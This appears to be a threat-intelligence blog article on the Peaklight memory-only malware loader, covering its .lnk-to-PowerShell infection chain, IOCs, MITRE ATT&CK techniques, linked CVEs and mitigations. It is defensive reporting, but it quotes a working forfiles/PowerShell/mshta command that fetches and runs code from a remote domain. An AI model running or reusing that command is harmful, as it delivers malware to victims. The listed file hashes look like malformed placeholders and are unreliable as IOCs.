In September 2024, Mandiant uncovered Peaklight, a sophisticated memory-only malware, which has been making waves in the cybersecurity community due to its stealth and effectiveness. This malware-as-a-service (MaaS) campaign primarily delivers infostealers like CryptBot and ShadowLadder, using advanced evasion techniques to bypass traditional detection mechanisms. By leveraging known vulnerabilities and sophisticated attack chains, Peaklight is becoming a major threat to organizations.
This article delves into the Indicators of Compromise (IOCs), MITRE ATT&CK TTPs, and documented CVEs associated with this evolving threat.
Peaklight’s Attack Chain and IOCs
Peaklight’s infection chain begins with a .lnk file (Windows shortcut) that masquerades as a legitimate file, such as a movie download. Once executed, it runs a JavaScript dropper directly in memory, completely avoiding disk-based detection. The dropper, in turn, executes a PowerShell script that decrypts additional payloads like CryptBot and ShadowLadder.
Key IOCs identified in this campaign include:
- Domains:
nexto[.]max.b-cdn[.]net
- File Hashes:
.lnk files
: (e.g.,9f7c79f23970b743d539abc1234
)- CryptBot payloads: (
e.g.,
fa123df82987b76312`).
PowerShell Command Example:
bashCopy codeforfiles.exe /p C:\Windows /m win.ini /c "powershell -ep bypass . mshta https://nexto[.]max.b-cdn[.]net/nexto"
MITRE ATT&CK TTPs Associated with Peaklight
The MITRE ATT&CK Framework maps out specific techniques and tactics used by Peaklight throughout its attack lifecycle. These include:
- T1059.001 – Command and Scripting Interpreter: PowerShell: Peaklight uses PowerShell extensively to execute its payloads in memory without writing to disk.
- T1204.002 – User Execution: Malicious File: The initial infection vector is a
.lnk
file disguised as a legitimate download. - T1071.001 – Application Layer Protocol: Web Protocols: Peaklight communicates with C2 servers using web protocols like HTTP/HTTPS to download additional payloads.
- T1027 – Obfuscated Files or Information: The payloads are heavily obfuscated, using techniques like base64 and hex encoding to avoid detection.
- T1218.005 – Signed Binary Proxy Execution: Mshta: Mshta is used to execute scripts from a remote source as part of the infection chain.
Documented CVEs Exploited by Peaklight
While Peaklight is stealthy in its approach, it has been linked to certain vulnerabilities in the software it targets. These vulnerabilities are often used to facilitate the malware’s deployment or to escalate privileges once the initial compromise occurs.
- CVE-2022-30190 (Follina): This vulnerability in Microsoft Windows supports remote code execution via crafted documents. Peaklight has been seen exploiting Follina to execute its JavaScript payloads through Office documents.
- CVE-2021-40444: A remote code execution vulnerability in Microsoft MSHTML, frequently used by attackers to deliver malware via malicious Office documents.
Both CVEs were critical in enabling Peaklight to be executed remotely with minimal user interaction, making it a dangerous adversary in environments with inadequate patch management.
Mitigation Strategies
Given the advanced nature of Peaklight, organizations should consider the following mitigation strategies:
- Patch Vulnerabilities: Ensure that critical vulnerabilities like CVE-2022-30190 and CVE-2021-40444 are patched immediately.
- Memory Scanning: Deploy EDR solutions that support memory-only malware detection to catch threats like Peaklight that avoid disk-based detection.
- PowerShell Logging and Restrictions: Enable comprehensive PowerShell logging to monitor for unusual script execution, and apply constrained language mode to block unauthorized scripts.
- User Training: Train users to recognize phishing emails and avoid downloading untrusted files, particularly those masquerading as pirated content.
- Network Segmentation: Limit the ability for compromised machines to communicate with critical systems by implementing strict network segmentation and firewall rules.
The discovery of Peaklight demonstrates the increasing sophistication of modern malware. Its memory-only nature and use of documented vulnerabilities like CVE-2022-30190 make it an especially formidable adversary. Organizations must adopt advanced detection tools and ensure robust patch management to defend against such threats.
Further Reading:
- Mandiant Threat Report on Peaklight
- Microsoft’s Advisory on CVE-2022-30190
- Understanding CryptBot Malware